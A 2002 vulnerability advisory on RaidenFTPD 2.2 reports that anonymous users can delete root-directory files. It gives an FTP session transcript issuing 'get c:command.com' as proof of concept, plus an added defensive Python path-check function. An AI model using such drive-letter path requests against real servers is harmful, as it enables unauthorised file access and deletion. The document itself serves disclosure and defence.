File Deletion Vulnerability in RaidenFTPD for Windows
A vulnerability exists in Raiden FTPD 2.2 that lets an attacker delete any file on the system located in the root directory (c:\, d:\, etc.).
January 14, 2002
Reported January 14, 2002, by Tamer Sahin.
VERSIONS AFFECTED
RaidenFTPD 2.2 for Windows 2000, Windows NT, and Windows 9x
DESCRIPTION
A vulnerability exists in Raiden FTPD 2.2 that lets an attacker delete any file on the system located in the root directory (c:\, d:\, etc.).
DEMONSTRATION
The discoverer posted the following demonstration as proof-of-concept:
C:>ftp 192.168.10.3
Connected to 192.168.10.3.
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2002/01/13 17:07)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (192.168.10.3:(none)): anonymous
331 Password required for anonymous .
Password:
230------------------------------------------------------------------------+
230- lvl=level r=root s=superusers n=normal g=guest * = all userlevels
230- grp=group n=nukers s=sitebot
230-for more detailed descriptions, please visit raidenftpd homepage
230-http://playstation2.idv.tw/raidenftpd/raiden-ftpd-doc/help-sitecmd.html
230------------------------------------------------------------------------+
230 User anonymous logged in, proceed.
ftp> get c:command.com
Error opening local file command.com.
> command.com:Permission denied
ftp> quit
221-
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
221- anonymous , ºAñ¦ñ-ñW¦¦ "0" BYTES, ñU+n "0"
BYTES
221- +QºA¦ßí@~~~~S·ñ¯~~~~
221- ªA¿úíA+w¬nªAª+Ñ·-{!!!!
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
221-.
221 Goodbye.
And file has been deleted!
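The request in the transcript, get c:command.com, names the file by drive letter rather than relative to the FTP root. The advisory does not state the root cause, so what follows is an added example (not RaidenFTPD code and not the discoverer's) of a server-side path check that refuses such arguments; resolve_in_root, PathRejected, is_allowed and the D:\ftproot root are assumptions made for illustration.

```python
import ntpath  # Windows path semantics, importable on any OS


class PathRejected(Exception):
    """The FTP path argument must not be served."""


def resolve_in_root(ftp_root, cwd, requested):
    """Map a client-supplied FTP path to a Windows path under ftp_root.

    ftp_root:  absolute directory the account is confined to (assumed config)
    cwd:       the session's virtual working directory, e.g. "/pub"
    requested: raw argument of RETR/STOR/DELE as sent by the client
    """
    if "\x00" in requested:
        raise PathRejected("NUL byte in path")
    req = requested.replace("/", "\\")
    # "c:command.com", "c:\\x" and "\\\\host\\share\\x" all carry a drive part.
    drive, rest = ntpath.splitdrive(req)
    if drive or ":" in rest:
        raise PathRejected("drive, UNC or stream specifier in path")
    # Absolute virtual paths start at the FTP root, relative ones at cwd.
    if rest.startswith("\\"):
        virtual = rest
    else:
        virtual = ntpath.join(cwd.replace("/", "\\"), rest)
    root = ntpath.normpath(ftp_root)
    candidate = ntpath.normpath(ntpath.join(root, virtual.lstrip("\\")))
    # Once ".." is collapsed the result must still sit under the root.
    if candidate != root and not candidate.startswith(root.rstrip("\\") + "\\"):
        raise PathRejected("path escapes FTP root")
    return candidate


def is_allowed(requested, cwd="/", ftp_root="D:\\ftproot"):
    """True if the argument resolves inside ftp_root (constructed default root)."""
    try:
        resolve_in_root(ftp_root, cwd, requested)
        return True
    except PathRejected:
        return False
```

The check is purely lexical: it does not resolve junctions or reserved device names, which a real server would also have to handle.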
VENDOR RESPONSE
The vendor, RaidenFTPD, has been notified but hasn't issued a patch.
CREDIT
Discovered by Tamer Sahin of Security Office.